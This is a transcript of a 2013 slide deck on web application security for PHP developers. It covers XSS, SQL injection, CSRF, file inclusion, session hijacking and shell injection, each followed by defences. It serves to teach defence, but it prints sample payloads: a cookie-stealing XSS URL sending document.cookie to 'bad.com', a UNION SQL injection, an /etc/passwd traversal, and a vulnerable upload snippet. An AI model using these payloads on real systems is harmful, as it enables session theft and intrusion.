Web Application Security - Folio3

  • Published on
    15-Jul-2015

  • View
    233

  • Download
    0

Embed Size (px)

Transcript

Web Application Security

Web Application Security DOs and DONTsM. Waseem & A. Mateen23rd May 2013

@folio_3www.folio3.comCopyright 2015

1Web Application SecurityIts a vast topic

While you do not know attacks, how can you know about defense?

High level and common vulnerabilitiesHow to avoid these?

@folio_3www.folio3.comCopyright 2015

2It is Important75% of cyber attacks and internet security violations are generated through Internet applications

Source: Gartner Group

@folio_3www.folio3.comCopyright 2015

Web applications are accessible and open for anyone In many cases Source Code is OpenSource

3Vulnerabilities are common!iViZ Security study (2012) shows99% of the Apps tested had at least 1 vulnerability82% of the web application had at least 1 High/Critical Vulnerability90% of hacking incidents never gets known to publicAverage number of vulnerability per website: 3530% of the hacked organizations knew the vulnerability (for which they got hacked) beforehand#1 Vulnerability: Cross site scripting (61%)

@folio_3www.folio3.comCopyright 2015

Research Methodology 300+ Customers 5,000 + Application Security Tests 25% Apps from Asia, 40% Apps from USA and 25% from Europe

4Top Vulnerabilities

@folio_3www.folio3.comCopyright 2015

5High Level VulnerabilitiesCross-Site Scripting (XSS) Information leakageSQL InjectionCross-Site Request Forgery (CSRF)Unrestricted File UploadFile InclusionPhishingSession HijackingShell injection

@folio_3www.folio3.comCopyright 2015

6Cross-Site Scripting (XSS)An attacker can inject executable code (JS, HTML, etc.) into a webpage.Example: http://site.com/search.php?q=alert(XSS)Types:Non-PersistentPersistent

@folio_3www.folio3.comCopyright 2015

Cross-Site Scripting (XSS)Non-PersistentAttacker is able to execute his own code into a webpage but no changes can be done in that website.Examplehttp://www.site.com/viewtopic.php?id=4">document.location="http://bad.com/logger.php?cookie="+document.cookie;Orhttp://www.site.com/viewtopic.php?id=4>document.write();

@folio_3www.folio3.comCopyright 2015

Cross-Site Scripting (XSS)PersistentAttacker stores executable code in the website database which is being executed every time webpage is showing the data.Common targetsCommentsUser submitted content Signup forms etc.

@folio_3www.folio3.comCopyright 2015

Cross-Site Scripting (XSS)Example

@folio_3www.folio3.comCopyright 2015

Cross-Site Scripting (XSS)Comment in raw format:and I like the way this website developerswork..hahaha :D :D

Should have been printed like

@folio_3www.folio3.comCopyright 2015

Cross-Site Scripting (XSS)SolutionsInput sanitizationPHP function strip_tags(), htmlentities(), htmlspecialchars()PHP filter_input()PHP libraries:HTML Safe, htmLawed, kses, Safe HTML Checker, etcOutput sanitizationPHP htmlentities(), htmlspecialchars()

@folio_3www.folio3.comCopyright 2015

Information LeakageAn application reveals sensitive data, such as technical details of the web application, environment, or user-specific data.ExampleWarning: mysql_connect() [function.mysql-connect]: Access denied for user 'root'@'localhost' (using password: YES) in /usr/www/kint/view.php on line 8Warning: include(pages/../../../../../../etc/passwd1) [function.include]: failed to open stream: No such file or directory in /usr/www/users/kint/view.php on line 20

@folio_3www.folio3.comCopyright 2015

Example of information leakage https://www.google.com/search?q=%22admin+account+info%22+filetype%3Alog

http://code.jellycan.com/memcached/

13Information LeakageFaulty directory listing configurationAll files in directory visibleImproper error handlingError message may contain paths, user, server infoSpecifically in php file path is reveledFiletype handlingHTTP Headers X-Powered-By, X-Generator etcSensitive HTML comments, etc.

@folio_3www.folio3.comCopyright 2015

1.Directory listing misconfiguration: Leaving directory listing enabled allows the attacker to read the list of all files in a directory.

14Information LeakageDirectory listing configurationPut a blank file named index.html in that directory.Disable indexing in .htaccessOptions indexesAll sub-directories of that directory will also get their directory listings turned off.Error handlingConfigure error message using error_reporting, display_errors, log_errors and error_log in php.iniConfigure error handling in .htaccess as well

@folio_3www.folio3.comCopyright 2015

1.Directory listing misconfiguration: Leaving directory listing enabled allows the attacker to read the list of all files in a directory.

15Information LeakageRemove headers which reveal informationX-Powered-By, X-Generator etcUse header_remove() PHP functionComments in sourceNever put much information in html or jsComments should be in php so that they are not visible to visitor

@folio_3www.folio3.comCopyright 2015

Information LeakageFilestypesNever keep files which can be downloaded in public directory, unless it is for public. Include files (.inc, .class, .db etc.)Compressed files(.zip, .rar, .tar.gz, etc.)Database files(.sql, .cvs, .xml, .xls, etc.)Unknown files(.bak, .inc, .copy, .bkp, etc.)Configure htaccess

order allow,denydeny from all

@folio_3www.folio3.comCopyright 2015

SQL InjectionAttacker is able to inject custom sql into a query. Examplehttp://site.com/product.php?id=10+AND+1=2+union+select+1,2,database(),version(),user(),6+--

@folio_3www.folio3.comCopyright 2015

Select id, meta_title, name, details, category, metadescription WHERE id = 10 and deleted = 0

Will become

Select id, meta_title, name, details, category, metadescription WHERE id = 10 and 1=2UNION select 1,2, database(), version(), user(), 6 --and deleted = 018SQL InjectionSelect id, meta_title, name, details, category, metadescription WHERE id = 10 and deleted = 0becomesSelect id, meta_title, name, details, category, metadescription WHERE id = 10 and 1=2 UNION select 1,2, database(), version(), user(), 6 --and deleted = 0

@folio_3www.folio3.comCopyright 2015

@folio_3www.folio3.comCopyright 2015

SQL InjectionEscape the inputmysql_real_escape_string()filter_var()Intval, floatvalFilter input (use whitelists not blacklists)Use prepared statements, parameterized queries etc. Most frameworks/cms have it.Limit database permissions (start with the lowest permissions)

@folio_3www.folio3.comCopyright 2015

Cross-Site Request Forgery (CSRF)Allow other websites to send unauthorized requests to it, using the active session of its authorized users.ExampleUser visits a site where attacker has already injected his code (hacked.com) in another tab/windowA review is posted for bad.com

@folio_3www.folio3.comCopyright 2015

22Cross-Site Request Forgery (CSRF)

document.Form.submit();

@folio_3www.folio3.comCopyright 2015

Consider a payment site

23Cross-Site Request Forgery (CSRF)SolutionUse hash tokens into each generated form.Check token when form is submittedCheck referrer header (partial protection)

@folio_3www.folio3.comCopyright 2015

Unrestricted File UploadAllows attacker to upload malicious files to the server. Most of the time scripts to take control server.Example$usrFile = $_FILES[userfile][name];$uploadFolder= "uploads/"; if(move_uploaded_file($usrFile,$uploadFolder)) { echo File has been successfully uploaded.;} else{ echo Error. Please try again!"; }

@folio_3www.folio3.comCopyright 2015

Unrestricted File UploadSolutionWhite list the extensions which can be uploadedCheck for double extensionsCheck mime type (partial solution)Rename file before savingRestrict access to uploaded files (htaccess)

order deny,allowallow from all

@folio_3www.folio3.comCopyright 2015

File InclusionAllows an attacker to include local or remote file into the vulnerable webpage code.EXAMPLE:http://site.com/view.php?file=../../../../../etc/passwdFiles can be server configuration files such as system users information, filesystem structure, code etc

@folio_3www.folio3.comCopyright 2015

File InclusionVulnerable PHP codes

etc.

@folio_3www.folio3.comCopyright 2015

File InclusionPotential target functionsinclude()/include_once()require()/require_once()file_get_contents()fopen()file()copy()unlink()upload_tmp_dir()move_uploaded_file()Imagecreatefrom functions etc

@folio_3www.folio3.comCopyright 2015

File InclusionUse open_basedir settings in php.iniFilter input for functions mentioned in previous slide.Use whitelisted filenames or allow only valid file name characters (dont allow ../ etc)Modify the php.ini configuration file:allow_url_fopen = Offallow_url_include = Offregister_globals = Off (in older versions its ON by default)

@folio_3www.folio3.comCopyright 2015

PhishingSocial Engineering technique to steal confidential information through the use of fake login page.EXAMPLE:http://www.gooqle.com/accounts/ServiceLogin?service=mail

@folio_3www.folio3.comCopyright 2015

Phishing

Exact replica is served to the visitor, data is sent to hacker

@folio_3www.folio3.comCopyright 2015

PhishingUse HTTPS instead of HTTP

So that user may see the details of the domain owner in the SSL certificate information.Use short URL addresses for login pagesSo that users could easily recognize login page address.Use Yahoo! Sign-in Seal like systemIt is a unique identifier chosen by the user.

@folio_3www.folio3.comCopyright 2015

Session HijackingAllows unauthorized access of an authorized user by having active session identifier (SID)

EXAMPLE:http://wg180.site.com/dk;jsessionid=0754aff827cfe9f7db7f48e7018ed1e6.wg180?st.cmd=userMain&tkn=8809

@folio_3www.folio3.comCopyright 2015

Session HijackingStore SID in HTTP cookiesDont accept SIDs from GET and POST requests, use cookies:session.use_cookies = 1session.use_only_cookies = 1This will prevent session fixation by urlRegenerate SID after login or on each requestPut session_regenerate_id(true); after the session_start()Accept only SIDs generated by own serverUse $_SESSION['SERVER_GENERATED_SID'] to identify whether SID has been created by your web server

@folio_3www.folio3.comCopyright 2015

35Session HijackingDestroy old SIDsKeep session time out smallini_set("session.cookie_lifetime","600");Completely destroy the session on user logoutUse SSL for user authentication and afterwardsIt will prevent network sniffing

@folio_3www.folio3.comCopyright 2015

Multiple ways of setting sessions timeout - Cookie time, garbage collection time, manually36Shell InjectionAllows an attacker to execute shell commands in the web server.Example http://site.com/delete.php?file=/

@folio_3www.folio3.comCopyright 2015

Shell InjectionPotential target functionsshell_exec(), exec(), system(), passthru(), eval()SolutionDisable shell functions, use disable_functions in php.iniAllow only white listed commands to be usedUse PHP built-in function to escape the user inputEscapeshellarg() , escapeshellcmd()

@folio_3www.folio3.comCopyright 2015

In a NutshellNever trust inputsGet, Post, Cookies, File uploadEvery input can be fakedFilter, Sanitize, Validate each inputUse white listsDont allow html unless requiredDont expose internal information of applicationsHandle exceptionsTest and Monitor application for securityKeep cms, frameworks, plugins updated (at least security fixes)

@folio_3www.folio3.comCopyright 2015

Vulnerability ScannersAcunetix WVSSkipfishAppScanHP WebInspectNikto (Wikto)NetsparkerW3afGrendel-ScanWebsecurifyBurp SuiteUniscanand more

@folio_3www.folio3.comCopyright 2015

ResourcesOWASP https://www.owasp.org/WASC http://projects.webappsec.orgVulnerapedia http://lab.gsi.dit.upm.es/semanticwiki/index.php/Main_PageCWE http://cwe.mitre.org/index.htmlSecuriteam http://www.securiteam.com/Tracker of vulnerable sites http://www.vulntraq.com/

@folio_3www.folio3.comCopyright 2015

41